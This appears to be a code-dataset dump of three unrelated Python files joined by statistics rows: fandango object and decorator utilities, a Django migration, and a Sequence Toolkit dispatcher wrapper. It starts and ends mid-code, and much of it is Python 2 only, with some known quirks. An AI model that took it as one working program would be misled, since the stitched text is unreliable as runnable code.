    This Class is in Beta, not fully implemented yet

    It makes easier to declare name independent property's (descriptors) by
    using template methods like:

        def fget(self,var): # var is the identifier of the variable
            return getattr(self,var)
        def fset(self,value,var): # var is the identifier of the variable
            setattr(self,var,value)
        def fdel(self,var): # var is the identifier of the variable
            delattr(self,var)

        MyObject.X = Property(fget,fset,fdel,'X')
    """
    getter = partial(fget, var=name) if fget else None
    setter = partial(fset, var=name) if fset else None
    deleter = partial(fdel, var=name) if fdel else None
    return property(getter, setter, deleter, doc=name)
import threading
# module-wide reentrant lock used as the default for locked()
__lock__ = threading.RLock()

def locked(f,*args,**kwargs):
    """
    decorator for secure-locked functions
    A key-argument _lock can be used to use a custom Lock object

    NOTE: exceptions raised by f() are printed and swallowed, in which
    case None is returned.
    """
    _lock = kwargs.pop('_lock',__lock__)
    try:
        _lock.acquire()
        return f(*args,**kwargs)
    except Exception,e:
        print 'Exception in%s(*%s,**%s): %s' % (f.__name__,args,kwargs,e)
    finally:
        _lock.release()
def self_locked(func,reentrant=True):
    ''' Decorator to make thread-safe class members
    @deprecated
    @note see in tau.core.utils.containers

    A (R)Lock is lazily created on the instance as ``self.lock`` and is
    held while the wrapped method executes.

    reentrant: CRITICAL:
        With Lock() this decorator should not be used to decorate nested
        functions; it will cause Deadlock!
        With RLock this problem is avoided ... but you should rely more
        on python threading.
    '''
    @functools.wraps(func)
    def lock_fun(self,*args,**kwargs):
        if not hasattr(self,'lock'):
            lock_class = threading.RLock if reentrant else threading.Lock
            setattr(self,'lock',lock_class())
        if not hasattr(self,'trace'):
            setattr(self,'trace',False)
        # acquire/release via context manager
        with self.lock:
            return func(self,*args,**kwargs)
    return lock_fun
###############################################################################
def NewClass(classname,classparent=None,classdict=None):
    """
    Creates a new class on demand:
     ReleaseNumber = NewClass('ReleaseNumber',tuple,
       {'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))})
    """
    bases = classparent
    # a single base class is wrapped into a tuple
    if bases and not isSequence(bases):
        bases = (bases,)
    return type(classname, bases or (object,), classdict or {})
class ReleaseNumber(object):
    """
    Comparable version number (e.g. '1.2.3'), built from a string, a
    sequence or separate arguments.

    ReleaseNumber = type('ReleaseNumber',(tuple,),{
      '__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))
      })
    """
    def __init__(self,*args):
        assert args
        if len(args)==1:
            if isinstance(args[0],basestring):  # NOTE: basestring is py2-only
                args = args[0].split('.')
            elif isSequenceType(args[0]):  # NOTE: removed from operator in py3
                args = args[0]
            else:
                args = [args]
        self._tuple = tuple(args)
    def __iter__(self): return self._tuple.__iter__()
    def __len__(self): return self._tuple.__len__()
    def __getitem__(self,i): return self._tuple.__getitem__(i)
    def __hash__(self): return self._tuple.__hash__()
    def __repr__(self):
        return '.'.join(map(str,self))
    def major(self):
        # NOTE(review): returns int on success but the string '0' on failure
        try:
            m = int(self[0])
            return m
        except:
            return '0'
    def minor(self):
        try:
            m = int(self[1])
            return m
        except:
            return '0'
    def patch(self):
        # non-numeric patch levels (e.g. 'rc1') are returned as-is
        try:
            m = int(self[2])
            return m
        except:
            return self[2] if len(self)>2 else '0'
    def __cmp__(self,other):
        # py2-style three-way compare; the rich comparisons below build on it
        if not isinstance(other,ReleaseNumber):
            other = ReleaseNumber(other)
        if self._tuple == other._tuple:
            return 0
        if int(self.major()) < other.major():
            return -1
        if int(self.major()) > other.major():
            return 1
        if int(self.minor()) < other.minor():
            return -1
        if int(self.minor()) > other.minor():
            return 1
        if self.patch() < other.patch():
            return -1
        if self.patch() > other.patch():
            return 1
        return 0
    def __gt__(self,other): return self.__cmp__(other) > 0
    def __ge__(self,other): return self.__cmp__(other) >= 0
    def __lt__(self,other): return self.__cmp__(other) < 0
    def __le__(self,other): return self.__cmp__(other) <= 0
    def __eq__(self,other): return not self.__cmp__(other)
    def __ne__(self,other): return self.__cmp__(other)
###############################################################################
class Object(object):
    """
    This class solves some problems when an object inherits from multiple
    classes and some of them inherit from the same 'grandparent' class
    """

    def __init__(self):
        """ default initializer
        @todo be more clever!
        """
        pass
        #self.name = None
        ## @var name
        # Var does nothing
        # @todo be more clever!
        pass

    def call__init__(self, klass, *args, **kw):
        # call klass.__init__ on self at most once, tracking which classes
        # have already been initialised in self.inited_class_list
        if 'inited_class_list' not in self.__dict__:
            self.inited_class_list = []
        if klass not in self.inited_class_list:
            self.inited_class_list.append(klass)
            #print('#'*80)
            #print('%s(%s).call__init__(%s,%s)' % (
                #type(self).__name__,klass.__name__,args,kw))
            #print('#'*80)
            klass.__init__(self, *args, **kw)

    def call_all__init__(self, klass, *_args, **_kw):
        ''' Call __init__ recursively, for multiple dynamic inheritance.
        @author srubio@cells.es

        This method should be called only if all arguments are keywords!!!
        Multiple __init__ calls with unnamed arguments is hard to manage:
            All the _args values will be assigned to non-keyword args
        e.g:
            from objects import Object
            class A(Object):
                def __init__(self,a=2):
                    print 'A.__init__',a
            class B(A):
                def __init__(self,b):
                    print 'B.__init__',b
            class C(B,A):
                def __init__(self,c):
                    print 'C.__init__',c
            class D(C,B):
                def __init__(self,d=1,*args,**kwargs):
                    self.call_all__init__(D,*args,**kwargs)
                    print 'D.__init__',d
            D(a=1,b=2,c=3,d=4)
        '''
        #if _args:
        #    raise Exception,'__init_all_Object_withUnnamedArgumentsException'
        from inspect import getargspec
        #print '%s.call_all__init__(%s,%s)' % (klass.__name__,_args,_kw)
        for base in klass.__bases__:
            if 'call__init__' in dir(base) and \
                ('inited_class_list' not in self.__dict__
                    or base not in self.inited_class_list):
                #print '\t%s.base is %s' % (klass.__name__,base.__name__)
                nkw,i = {},0
                try:
                    # match the base __init__ signature against the
                    # keywords and remaining positional arguments
                    args,largs,kargs,vals = getargspec(base.__init__)
                    if kargs: nkw = dict(_kw)
                    for arg in args:
                        if arg == 'self': continue
                        if arg in _kw:
                            nkw[arg] = _kw[arg]
                        elif i<len(_args):
                            nkw[arg], i = _args[i], i+1
                    self.call_all__init__(base,*_args,**_kw)
                    self.call__init__(base,**nkw)
                except Exception,e:
                    print('Unable to execute %s.__init__!: %s'
                        % (base.__name__,str(e)))
        return

    def getAttrDict(self):
        # export all non-callable public members as a plain dictionary
        return obj2dict(self)

    def updateAttrDict(self, other):
        attr = other.getAttrDict()
        self.__dict__.update(attr)
###############################################################################
class Singleton(object):
    """
    This class allows Singleton objects overriding __new__ and renaming
    __init__ to init_single

    The __new__ method is overriden to force Singleton behaviour,
    the Singleton is created for the lowest subClass.
    @warning although __new__ is overriden __init__ is still being called
    for each instance=Singleton(), this is way we replace it by __dub_init
    """
    ## Singleton object
    # the one, true Singleton, private members cannot be read directly
    __instance = None
    __dumb_init = (lambda self,*p,**k:None)

    def __new__(cls, *p, **k):
        # only create a new instance if the cached one is of another class
        if cls != type(cls.__instance):
            __instance = object.__new__(cls)
            #srubio: added init_single check to prevent redundant __init__ calls
            if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
                # move the real initializer aside so later Singleton() calls
                # do not re-run it
                setattr(cls,'init_single',cls.__init__)
                #Needed to avoid parent __init__ methods to be called
                setattr(cls,'__init__',cls.__dumb_init)
            if hasattr(cls,'init_single'):
                #If no __init__ or init_single has been defined it may trigger
                #an object.__init__ warning!
                cls.init_single(__instance,*p,**k)
            #Done at the end to prevent failed __init__ to create singletons
            cls.__instance = __instance
        return cls.__instance

    @classmethod
    def get_singleton(cls,*p,**k):
        # return the cached instance, creating it on first use
        return cls.__instance or cls(*p,**k)

    @classmethod
    def clear_singleton(cls):
        cls.__instance = None
class SingletonMap(object):
    """
    This class allows distinct Singleton objects for each args combination.
    The __new__ method is overriden to force Singleton behaviour, the Singleton
    is created for the lowest subClass.
    @warning although __new__ is overriden __init__ is still being called
    for each instance=Singleton(), this is way we replace it by __dub_init
    """
    ## Singleton object
    # the one, true Singleton, private members cannot be read directly
    __instances = {}
    __dumb_init = (lambda self,*p,**k:None)

    def __new__(cls, *p, **k):
        # one cached instance per (class, args, kwargs) key
        key = cls.parse_instance_key(*p,**k)
        if cls != type(cls.__instances.get(key)):
            __instance = object.__new__(cls)
            __instance.__instance_key = key
            #srubio:added init_single check to prevent redundant __init__ calls
            if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
                setattr(cls,'init_single',cls.__init__)
                #Needed to avoid parent __init__ methods to be called
                setattr(cls,'__init__',cls.__dumb_init)
            if hasattr(cls,'init_single'):
                #If no __init__ or init_single has been defined it may trigger
                #an object.__init__ warning!
                cls.init_single(__instance,*p,**k)
            cls.__instances[key] = __instance
            #print('#'*80+'\n'+'%s.__instances[%s] = %s'
            #    %(str(cls),key,str(__instance))
        return cls.__instances[key]

    @classmethod
    def get_singleton(cls,*p,**k):
        key = cls.parse_instance_key(*p,**k)
        # NOTE(review): dict.get evaluates cls(*p,**k) eagerly even on a
        # cache hit; harmless here because __new__ returns the cached one
        return cls.__instances.get(key,cls(*p,**k))

    @classmethod
    def get_singletons(cls):
        return cls.__instances

    @classmethod
    def clear_singleton(cls,*p,**k):
        cls.__instances.pop(cls.parse_instance_key(*p,**k))

    @classmethod
    def clear_singletons(cls):
        cls.__instances.clear()

    @classmethod
    def parse_instance_key(cls,*p,**k):
        # kwargs are sorted so keyword order does not create new instances
        return '%s(*%s,**%s)' % (cls.__name__,list(p),list(sorted(k.items())))

    def get_instance_key(self):
        return self.__instance_key
###############################################################################
class nullDecorator(object):
    """
    Do-nothing decorator accepting any constructor arguments; used as a
    drop-in replacement for pyqtSignal/pyqtSlot when Qt is unavailable.
    """
    def __init__(self, *args):
        # arguments are accepted and deliberately ignored
        pass

    def __call__(self, func):
        # hand the target back untouched
        return func
def decorator_with_args(decorator):
    '''
    Decorator with Arguments must be used with parenthesis: @decorated()
    , even when arguments are not used!!!

    Turns a d(func,*args,**kwargs) callable into a decorator factory that
    embeds the extra arguments in the returned single-argument decorator.

    But, this decorator disturbed stdout!!!!
    There are some issues when calling nested decorators; it is clearly
    better to use Decorator classes instead.
    '''
    def factory(*args, **kwargs):
        def apply_to(func):
            return decorator(func, *args, **kwargs)
        return apply_to
    return factory
class Decorated(object):
    """
    @TODO: This class should provide an API to get all decorators
    applied to a python object and its methods
    """
    # currently a bare marker base class with no behaviour
    pass
class Decorator(object):
    """
    This generic class allows to differentiate decorators from common classes.
    """
    __example__ = """
    SEE THE Cached DECORATOR CLASS FOR A REAL EXAMPLE, THIS IS JUST AN
    ABSTRACT CLASS WITHOUT IMPLEMENTATION
    It uses the __get__ descriptor to allow decoration of Class methods
    Inherit from it and use issubclass(klass,Decorator) to know if a class
    is a decorator
    To add arguments to decorator reimplement __init__
    To modify your wrapper reimplement __call__
    A decorator __init__ with a single argument can be called like:
      @D
      def f(x):
        pass
    If you need a Decorator with arguments then __init__ will manage the
    arguments and __call__ will take the function and return a wrapper instead.
      @D(x,y)
      def f(z):
        pass
    """
    @classmethod
    def new_wrapped_instance(cls, *args, **kwargs):
        """ obtain a better wrapped instance, experimental, doesnt work well on py2

        Creates a dynamic subclass named after the wrapped function so the
        instance carries the function's __doc__.
        """
        func = args and args[0] or None
        i = object.__new__(type(cls.__name__+'_'+func.__name__,(cls,),
            {'__doc__': func.__doc__}))
        cls.__init__(i,*args,**kwargs)
        return i

    def __init__(self,func):
        # the wrapped callable; update_wrapper copies __name__/__doc__ etc.
        self.func = func
        #self.call = wraps(self.func)(self.__call__) #Not for methods!!
        functools.update_wrapper(self,self.func)

    def __call__(self,*args,**kwargs):
        return self.func(*args,**kwargs)

    def __get__(self,obj,objtype=None):
        """
        This bounding method will be called only when decorating an
        instance method
        """
        # NOTE: the three-argument MethodType form is Python 2 only
        return MethodType(self,obj,objtype)

    def get_func(self):
        return self.func
class ClassDecorator(Decorator):
    """
    This empty class is not trivial. It identifies the QObject decorators
    from fandango.qt module

    Although empty, it is critical for Vacca. Modify it with care
    """
    # marker subclass: behaviour is fully inherited from Decorator
    pass
class Cached(Decorator):
    """
    Decorator that caches up to ``depth`` different executions of a
    method (one entry per distinct argument combination) for ``expire``
    seconds.  It is very similar to functools.lru_cache in py3.

    If ``catched`` is True, exceptions raised by the wrapped function
    are logged and returned instead of re-raised.
    """
    __example__ = """
    e.g.: check_device_cached = Cached(check_device,depth=10,keep=3)
    It will keep cached for 3 seconds up to 10 different device check results.
    If "func" is not declared, then it can be used as a decorator_with_args
    @Cached(depth=10,keep=3)
    def check_device(*a,**k):
    ...
    return
    The catched argument will print and return exceptions instead of throwing
    """

    def __init__(self, func=None, depth=10, expire=3., log=False,
                 catched=False):
        """
        :param func: callable to wrap; if None, the instance acts as a
            decorator-with-arguments and wraps on its first call.
        :param depth: max number of distinct argument combinations kept.
        :param expire: seconds a cached result stays valid.
        :param log: False, True (print) or a callable used for logging.
        :param catched: return exceptions instead of raising them.
        """
        self.log = log
        self._im = None  # kept for backwards compatibility
        self.cache = {}
        self.depth = depth
        self.expire = expire
        self.catched = catched
        self.decorate(func)
        # decorate() copied func.__doc__ via update_wrapper; override it
        # afterwards so the '@Cached:' prefix survives.
        self.__doc__ = '@Cached:' + str(getattr(func, '__doc__', '') or '')
        self.lock = threading.Lock()

    def __call__(self, *args, **kwargs):
        """
        Either decorate a method (deferred decorator usage) or execute
        the already-wrapped function through the cache.
        """
        if self.func is None:
            # Deferred decorator: the first call provides the function.
            self.decorate(args[0])
            return self
        # Instantiated decorator: run through the cache.
        return self.execute(*args, **kwargs)

    def _log(self, msg):
        # Route messages to the configured logger: a callable gets
        # called, any other truthy value falls back to print().
        if isCallable(self.log):
            self.log(msg)
        elif self.log:
            print(msg)

    @staticmethod
    def getCachedObject(obj, methods=None, depth=10, expire=3.,
                        catched=False):
        """ @RISKY
        This method will try to apply Cached decorator to all methods
        of an object. USE IT AT YOUR OWN RISK!!

        (``methods`` default changed from a mutable ``[]`` to None, and
        ``depth`` from the float ``10.`` to an int so it is usable as a
        slice bound — behaviour for existing callers is unchanged.)
        """
        klass = obj if isinstance(obj, type) else type(obj)
        if not methods:
            methods = [k for k, f in klass.__dict__.items() if isCallable(f)]
        for k in methods:
            try:
                m = Cached(getattr(klass, k), depth, expire, catched=catched)
                setattr(obj, k, m)
            except Exception:
                # best-effort: skip attributes that cannot be wrapped
                pass
        return obj

    def decorate(self, func):
        """Wrap ``func``, or reset to the undecorated state when it is
        not callable (enables the decorator-with-arguments usage)."""
        if isCallable(func):
            self.func = func
            functools.update_wrapper(self, self.func)
        else:
            self.func = None

    def prune(self, expire=None, depth=None):
        """
        Drop expired entries and trim the cache to ``depth`` items;
        returns the sorted list of surviving keys (oldest first).
        Explicit arguments override the instance defaults (the previous
        implementation silently ignored its ``depth`` argument).
        """
        with self.lock:
            depth = int(notNone(depth, self.depth))
            deadline = time.time() - notNone(expire, self.expire)
            # Keys are (timestamp, args, kwargs) tuples; keep fresh ones.
            keys = sorted(k for k in self.cache.keys() if k[0] > deadline)
            self.cache = dict((k, self.cache[k]) for k in keys[-depth:])
            return sorted(self.cache.keys())

    def clear(self):
        """Discard every cached result."""
        self.cache.clear()

    def execute(self, *args, **kwargs):
        """
        Run the wrapped function, returning a cached value when a call
        with the same arguments is still fresh.
        """
        v, match, expire = None, None, self.expire
        try:
            key = time.time(), tuple(args), tuple(kwargs.items())
            assert isHashable(key)
        except Exception:
            # Unhashable arguments cannot be cached; bypass the cache.
            self._log('unhashable arguments!')
            expire = 0
        if not self.depth or not expire:
            self._log('disabling cache ...')
            if not self.depth:
                self.cache = {}
            return self.func(*args, **kwargs)
        cache = self.prune(expire)
        # A hit is any fresh key with the same (args, kwargs) tail.
        match = first((k for k in cache if k[1:] == key[1:]), None)
        if match:
            v = self.cache[match]
        else:
            try:
                v = self.func(*args, **kwargs)
            except Exception as e:  # was py2-only "except Exception,e"
                v = e
            try:
                self.cache[key] = v
            except Exception:
                print('%s(%s,%s) = %s' % (self.func, args, kwargs, v))
                print('cache[%s] = %s' % (key, v))
                raise
        if isinstance(v, Exception):
            if self.catched:
                # Log the traceback only on the first (uncached) failure.
                if not match:
                    self._log(traceback.format_exc())
                return v
            else:
                self._log(str(self.func))
                self._log(traceback.format_exc())
                raise v
        return v
###########################################################################
## @DEPRECATED!
class BoundDecorator(Decorator):
    """
    DEPRECATED , To be removed in Fandango 13;
    replaced by the use of __get__ descriptor
    Inspired in
    https://wiki.python.org/moin/PythonDecoratorLibrary
    #Class_method_decorator_using_instance
    Class method decorator specific to the instance.
    It uses a descriptor to delay the definition of the
    method wrapper.
    To use it, just inherit from it and rewrite the wrapper method
    Example:
    from fandango.objects import BoundDecorator
    BoundDecorator().tracer = 1
    class X(object):
        def __init__(self,name):
            self.name = name
        def f(self,*args):
            return (self.name,args)
    class D(BoundDecorator):
        @staticmethod
        def wrapper(instance,f,*args,**kwargs):
            print('guess what?')
            v = f(instance,*args,**kwargs)
            return v[0]
    x = X('a')
    X.f = D()(X.f)
    x.f()
    """
    def __init__(self,*args,**kwargs):
        # Warn loudly: this class survives only for backwards compatibility.
        print('BoundDecorator is DEPRECATED!!!, Use Decorator.__get__ instead')
        Decorator.__init__(self,*args,**kwargs)
    @staticmethod
    def wrapper(instance,f,*args,**kwargs):
        # Default wrapper: plain pass-through call; subclasses override it.
        return f(instance, *args, **kwargs)
    class _Tracer(object):
        # Tiny descriptor used as a class-wide debug switch: truthy when
        # tracing is enabled, callable to emit a trace message.
        def __init__(self):
            self._trace = False
        def __get__(self,obj,type=None):return self
        def __set__(self,obj,value):self._trace = value
        # NOTE(review): __nonzero__ is the Python 2 truth hook; Python 3
        # would need __bool__ for "if self:" below to honour _trace.
        def __nonzero__(self): return self._trace
        def __call__(self,msg):
            if self: print(msg)
    #NOTE: Giving a value to Tracer only works with instances; not from class
    tracer = _Tracer()
    def __call__(this,f=None):
        # 'this' is the decorator instance, 'f' the function to decorate.
        # A descriptor is returned so binding is deferred until access.
        class _Descriptor(BoundDecorator):
            # Inherits to get the wrapper from the BoundDecorator class
            # and be able to exist "onDemand"
            def __init__(self, f):
                self.func = f
            def __get__(self, instance, klass):
                BoundDecorator.tracer('__get__(%s,%s)'%(instance,klass))
                if instance is None:
                    # Class method was requested
                    return self.make_unbound(klass)
                return self.make_bound(instance)
            def make_unbound(self, klass):
                # Build a wrapper for access through the class (no instance).
                BoundDecorator.tracer('make_unbound(%s)'%klass)
                @functools.wraps(self.func)
                def wrapper(*args, **kwargs):
                    '''This documentation will disapear :)
                    This method may work well only without arguments
                    '''
                    BoundDecorator.tracer(
                        "Called the unbound method %s of %s"
                        %(self.func.__name__, klass.__name__))
                    return partial(this.wrapper,f=f)(*args,**kwargs)
                return wrapper
            def make_bound(self, instance):
                # Build, cache and return a wrapper bound to 'instance'.
                BoundDecorator.tracer('make_bound(%s)'%instance)
                @functools.wraps(self.func)
                def wrapper(*args, **kwargs):
                    '''This documentation will disapear :)'''
                    BoundDecorator.tracer(
                        "Called the decorated method %s of %s"
                        %(self.func.__name__, instance))
                    #return self.func(instance, *args, **kwargs)
                    return this.wrapper(instance,f,*args,**kwargs)
                #wrapper = self.wrapper #wraps(self.func)(self.wrapper)
                # This instance does not need the descriptor anymore,
                # let it find the wrapper directly next time:
                setattr(instance, self.func.__name__, wrapper)
                return wrapper
        return _Descriptor(f)
# Build this module's docstring automatically from the definitions above
# (fandango's autodoc helper scans the module namespace via vars()).
from . import doc
__doc__ = doc.get_fn_autodoc(__name__,vars())
| 33.938967 | 89 | 0.56135 | 4,340 | 36,145 | 4.441014 | 0.150691 | 0.02231 | 0.009131 | 0.002179 | 0.230051 | 0.187455 | 0.165404 | 0.142212 | 0.131109 | 0.098008 | 0 | 0.005 | 0.313819 | 36,145 | 1,064 | 90 | 33.970865 | 0.772115 | 0.109171 | 0 | 0.280822 | 0 | 0 | 0.078391 | 0.004631 | 0 | 0 | 0 | 0.00282 | 0.005137 | 0 | null | null | 0.015411 | 0.035959 | null | null | 0.023973 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b44a978913b26bbf0d8ab188b6560f82d0fe2d3 | 1,068 | py | Python | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 4 | 2018-03-12T23:49:01.000Z | 2020-07-06T17:37:29.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 259 | 2018-02-06T07:53:07.000Z | 2020-06-05T19:18:32.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 22 | 2018-01-25T14:02:05.000Z | 2020-06-24T20:37:01.000Z | # Generated by Django 2.1.7 on 2019-05-10 09:21
from django.db import migrations, models
class Migration(migrations.Migration):
    """Replace StateTransition.state with two finer-grained state fields."""

    dependencies = [
        ('core', '0043_auto_20190424_1029'),
    ]

    # Choice lists named for readability; values are identical to the
    # originally generated inline literals.
    _ASSET_STATE_CHOICES = [
        ('requires repair', 'requires repair'),
        ('requires external assessment', 'requires external assessment'),
        ('Damaged', 'Damaged'),
    ]
    _INCIDENT_STATE_CHOICES = [
        ('newly reported', 'newly reported'),
        ('internal assessment', 'internal assessment'),
        ('external assessment', 'external assessment'),
        ('out for repair', 'out for repair'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='statetransition',
            name='state',
        ),
        migrations.AddField(
            model_name='statetransition',
            name='asset_state_from_report',
            field=models.CharField(choices=_ASSET_STATE_CHOICES,
                                   default='requires repair',
                                   max_length=50),
        ),
        migrations.AddField(
            model_name='statetransition',
            name='incident_report_state',
            field=models.CharField(choices=_INCIDENT_STATE_CHOICES,
                                   default='newly reported',
                                   max_length=50),
        ),
    ]
| 38.142857 | 258 | 0.634831 | 105 | 1,068 | 6.333333 | 0.495238 | 0.108271 | 0.108271 | 0.126316 | 0.138346 | 0.138346 | 0 | 0 | 0 | 0 | 0 | 0.042579 | 0.230337 | 1,068 | 27 | 259 | 39.555556 | 0.766423 | 0.042135 | 0 | 0.380952 | 1 | 0 | 0.374143 | 0.065622 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b479dbf807c903d09638149ff0de16acee169e3 | 5,827 | py | Python | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | apis/python_interface_helpers/stk_env.py | davetrollope-fsml/sequence_toolkit | 49495f679aad1d7c134cf8a189cca1e8acc9f4bd | [
"MIT"
] | null | null | null | from stk_sequence import *
from stk_tcp_server import *
from stk_tcp_client import *
from stk_data_flow import *
from stk_options import stk_clear_cb
import time
class stk_callback:
    """
    Base class for application callbacks: tracks an optional caller
    (the object that registered the underlying callback) and an
    optional mapped object, and provides default no-op file-descriptor
    lifecycle hooks.
    """
    def __init__(self):
        self._caller = None
        self._mapobj = None

    def add_callback_ref(self, caller):
        """Remember the caller that registered this callback."""
        self._caller = caller

    def del_callback_ref(self, caller):
        """Ask the tracked caller (if any) to drop its callback."""
        if self._caller:
            self._caller.delCallback()

    def add_callback_map_obj(self, mapobj):
        """Attach an arbitrary object to this callback."""
        self._mapobj = mapobj

    def map_obj(self):
        """Return the attached object (or None)."""
        return self._mapobj

    def close(self):
        """Unregister the tracked caller's callback and forget it."""
        if self._caller:
            self.del_callback_ref(self._caller)
            self._caller = None

    def caller(self):
        """Return the tracked caller (or None)."""
        return self._caller

    def fd_created(self, df, fd):
        """Hook: a file descriptor was created (no-op by default)."""
        pass

    def fd_destroyed(self, df, fd):
        """Hook: a file descriptor was destroyed (no-op by default)."""
        pass
class stk_dispatcher_cb(stk_dispatch_cb_class):
    """
    Adapter between the C dispatch callbacks and a user callback class:
    resolves raw pointers (passed in as ulongs) into python wrapper
    objects before delegating to the application callback methods.
    """
    def __init__(self, env, cbcls):
        # NOTE(review): stk_dispatch_cb_class.__init__ returns None, so
        # this attribute merely records that the base init ran — kept
        # exactly as the original implementation did.
        self.dispatchclass = stk_dispatch_cb_class.__init__(self)
        self._cbcls = cbcls
        self._env = env

    def close(self):
        # Intentionally a no-op; teardown is handled elsewhere.
        pass

    def finddf(self, dfptr):
        """Map a data-flow pointer (ulong) to a python wrapper, creating
        one on the fly for TCP flows that are not registered yet."""
        flow_ref = stk_ulong_df_to_df_ptr(dfptr)
        flow = stk_data_flow.find(dfptr)
        if flow is None:
            flow_type = stk_data_flow.type(dfptr)
            if flow_type == STK_TCP_ACCEPTED_FLOW or flow_type == STK_TCP_SERVER_FLOW:
                flow = stk_tcp_server(self._env, None, None, None, flow_ref)
            if flow_type == STK_TCP_CLIENT_FLOW:
                flow = stk_tcp_client(self._env, None, None, None, flow_ref)
        return flow

    def _find_sequence(self, seqptr):
        # Resolve a sequence pointer (ulong) to a wrapper, building one
        # around the raw reference when it is not registered yet.
        seq_ref = stk_ulong_seq_to_seq_ptr(seqptr)
        seq = stk_sequence.find(seqptr)
        if seq is None:
            seq = stk_sequence(self._env, None, None, 0, 0, None, seq_ref)
        return seq

    def process_data(self, dfptr, seqptr):
        """Forward received data to the application callback."""
        seq = self._find_sequence(seqptr)
        # dfptr is the C pointer converted to a ulong
        self._cbcls.process_data(self.finddf(dfptr), seq)
        seq.unmap()

    def process_name_response(self, dfptr, seqptr):
        """Forward a name-service response to the application callback."""
        seq = self._find_sequence(seqptr)
        # dfptr is the C pointer converted to a ulong
        self._cbcls.process_name_response(self.finddf(dfptr), seq)
        seq.unmap()

    def process_monitoring_response(self, dfptr, seqptr):
        # Monitoring responses are ignored by this adapter.
        pass

    def _wrap_server_flow(self, dfptr):
        # Shared lookup for the fd lifecycle hooks: only TCP server or
        # accepted flows are wrapped here (client/UDP flows are not
        # surfaced for fd creation/destruction events).
        flow = stk_data_flow.find(dfptr)
        if flow is None:
            flow_type = stk_data_flow.type(dfptr)
            if flow_type == STK_TCP_ACCEPTED_FLOW or flow_type == STK_TCP_SERVER_FLOW:
                flow = stk_tcp_server(self._env, None, None, None,
                                      stk_ulong_df_to_df_ptr(dfptr))
        return flow

    def fd_created(self, dfptr, fd):
        """Notify the application that a server-side fd was created."""
        flow = self._wrap_server_flow(dfptr)
        if flow:
            self._cbcls.fd_created(flow, fd)

    def fd_destroyed(self, dfptr, fd):
        """Notify the application that a server-side fd was destroyed."""
        flow = self._wrap_server_flow(dfptr)
        if flow:
            self._cbcls.fd_destroyed(flow, fd)
class stk_env:
    """
    Wrapper around the Sequence Toolkit environment: owns the SWIG
    environment handle plus a dispatch-callback caller, and exposes
    dispatcher control helpers.
    """
    def __init__(self,envopts):
        # Create the C-level environment with our dispatcher appended
        # to the supplied environment options.
        self.caller = stk_dispatch_cb_caller()
        envopts.append_dispatcher(self.caller.get_dispatcher())
        self._opts = envopts
        self._env = stk_create_env(envopts.ref())
        self._dispatcher_stopped = False;
    def close(self):
        # Tear down in reverse order of creation: clear the dispatcher
        # callback, detach and destroy the environment, then the caller.
        if self._env:
            if self._opts:
                stk_clear_cb(self._opts.ref(),"dispatcher")
            if self.caller:
                self.caller.detach_env(self._env)
            stk_destroy_env(self._env)
            if self.caller:
                self.caller.close()
                self.caller = None
            self._env = None
    def ref(self):
        # Raw environment handle for APIs that need it directly.
        return self._env
    def get_name_service(self):
        return stk_env_get_name_service(self.ref())
    def dispatch_timer_pools(self,interval):
        stk_env_dispatch_timer_pools(self._env,interval)
    def listening_dispatcher(self,df,svcgrp,appcb):
        # Blocking dispatch loop over data flow 'df' until
        # stop_dispatcher() is called; 'appcb' receives the callbacks.
        appcb.add_callback_ref(self.caller)
        self._dispatcher_stopped = False
        if self.caller.env_listening_dispatcher_add_fd(df.ref()) < 0:
            return
        while self._dispatcher_stopped == False:
            # __disown__() transfers ownership of the callback adapter to
            # the SWIG/C layer so python does not collect it prematurely.
            self.caller.env_listening_dispatcher(df.ref(),stk_dispatcher_cb(self,appcb).__disown__(),200)
        self.caller.env_listening_dispatcher_del_fd(df.ref())
    def client_dispatcher_timed(self,appcb,timeout):
        # One timed dispatch pass; 'appcb' may be None to dispatch
        # without application callbacks.
        if appcb:
            appcb.add_callback_ref(self.caller)
            self.caller.env_client_dispatcher_timed(self._env,timeout,stk_dispatcher_cb(self,appcb).__disown__())
        else:
            self.caller.env_client_dispatcher_timed(self._env,timeout,None)
    def stop_dispatcher(self):
        # Flag the listening loop to exit and nudge the C dispatcher;
        # the short sleep gives the loop time to notice the flag.
        self._dispatcher_stopped = True;
        self.caller.env_stop_dispatching(self._env)
        time.sleep(.2)
    def terminate_dispatcher(self):
        self.caller.env_terminate_dispatcher(self._env)
    @classmethod
    def append_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
        # Register name-server fd callbacks on the name-server options.
        nsopts = envopts.find_option("name_server_options")
        nsopts.update_ref(stk_append_name_server_fd_cbs(data_flow_group,nsopts.ref()))
    @classmethod
    def remove_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
